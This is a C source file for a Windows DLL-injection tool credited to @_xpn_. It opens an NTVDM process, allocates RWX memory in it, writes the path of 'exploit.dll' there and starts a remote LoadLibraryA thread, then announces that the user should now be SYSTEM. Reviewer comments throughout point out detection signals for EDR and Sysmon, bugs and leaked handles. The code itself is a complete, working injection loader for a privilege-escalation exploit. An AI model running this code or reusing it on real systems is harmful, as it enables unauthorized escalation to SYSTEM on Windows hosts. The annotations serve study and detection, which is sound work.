#include "stdafx.h"
/* Print the tool banner to stdout. Takes no arguments and has no return value. */
void PrintUsage(void) {
	fputs("Windows NTVDM DLL Injection\n", stdout);
	fputs("Created by @_xpn_\n", stdout);
}
/*
 * Entry point: injects a DLL into an already-running NTVDM process whose PID
 * is given on the command line, using the classic remote-thread sequence
 * OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
 * with LoadLibraryA as the thread start routine.
 *
 * From a monitoring standpoint this is exactly the cross-process API triad
 * (remote RWX allocation, remote write, remote thread creation) that EDR
 * products and Sysmon (event IDs 8 and 10) flag; nothing here attempts to
 * hide it.
 *
 * Return values: 1 on bad usage, 2 if the target process cannot be opened,
 * 3 on any later API failure. Reaching the end of main without a return
 * yields 0 under C99 and later.
 */
int main(int argc, char **argv)
{
int pid = 0;
HANDLE pHandle;
SIZE_T written = 0;
void *destMem, *loadLibrary;
char currentDir[MAX_PATH];
char dllPath[MAX_PATH];
PrintUsage();
if (argc != 2) {
/* BUG: "%s" is given no matching argument (argv[0] was intended), which is
 * undefined behavior in printf; the usage line prints garbage or crashes. */
printf("Usage: %s NTVDM_PID\n");
printf("Note: NTVDM can be launched by executing debug.exe\n\n");
return 1;
}
/* atoi reports no errors: a non-numeric argument silently becomes PID 0. */
pid = atoi(argv[1]);
/* PROCESS_ALL_ACCESS is far more than the four operations below need and is
 * one of the access masks handle-auditing rules key on. The open fails
 * unless the caller already holds sufficient rights over the target, so
 * this tool cannot reach a process it could not already control. */
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == NULL) {
printf("[X] OpenProcess() failed, make sure PID is for NTVDM process\n");
return 2;
}
else {
/* Format mismatch: HANDLE is a pointer type, so "%d" is the wrong
 * specifier here ("%p" would match). */
printf("[.] OpenProcess() completed, handle: %d\n", pHandle);
}
/* One page is committed as PAGE_EXECUTE_READWRITE even though it only ever
 * holds a path string; a remote RWX commit is a strong detection signal and
 * read/write protection would have been sufficient for the data written. */
if ((destMem = VirtualAllocEx(pHandle, NULL, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL) {
printf("[X] VirtualAllocEx() failed to allocate memory in process\n");
return 3;
}
else {
printf("[.] VirtualAllocEx() allocated memory at %p\n", destMem);
}
/* The LoadLibraryA address is resolved in THIS process and then used as the
 * start routine in the target; that only works if kernel32.dll is mapped at
 * the same base in both (true for a single boot session under ASLR, but
 * it is an assumption, not something the code checks). */
if ((loadLibrary = (void *)GetProcAddress(LoadLibraryA("kernel32.dll"), "LoadLibraryA")) == NULL) {
printf("[X] GetProcAddress() failed to find address of LoadLibrary()\n");
return 3;
}
else {
printf("[.] Found LoadLibrary() at address %p\n", loadLibrary);
}
/* Return value of GetCurrentDirectoryA is not checked; on failure currentDir
 * is left uninitialized and the path built below is garbage. The DLL name
 * is hard-coded to "exploit.dll" in the current working directory. */
GetCurrentDirectoryA(sizeof(currentDir), currentDir);
sprintf_s(dllPath, sizeof(dllPath), "%s\\%s", currentDir, "exploit.dll");
/* strlen(dllPath) excludes the NUL terminator; the string only stays
 * terminated because a freshly committed page is zero-filled. */
if (WriteProcessMemory(pHandle, destMem, dllPath, strlen(dllPath), &written) == 0) {
printf("[X] WriteProcessMemory() failed\n");
return 3;
}
else {
printf("[.] WriteProcessMemory() successfully wrote exploit DLL path to NTVDM\n");
}
/* The thread handle returned here is never closed or waited on, and pHandle
 * is never closed either: both leak until process exit. Because there is no
 * WaitForSingleObject, the "finished" message below only means the thread
 * was created, not that LoadLibraryA completed or succeeded. */
if (CreateRemoteThread(pHandle, NULL, NULL, (LPTHREAD_START_ROUTINE)loadLibrary, destMem, NULL, NULL) == NULL) {
printf("[X] CreateRemoteThread() failed to load DLL in victim process\n");
return 3;
}
else {
printf("[!!!] CreateRemoteThread() finished, exploit running...\n");
}
/* No return statement: main implicitly returns 0 here. */
printf("[!!!] If the exploit was successful, you should now be SYSTEM... enjoy :D\n\n");
}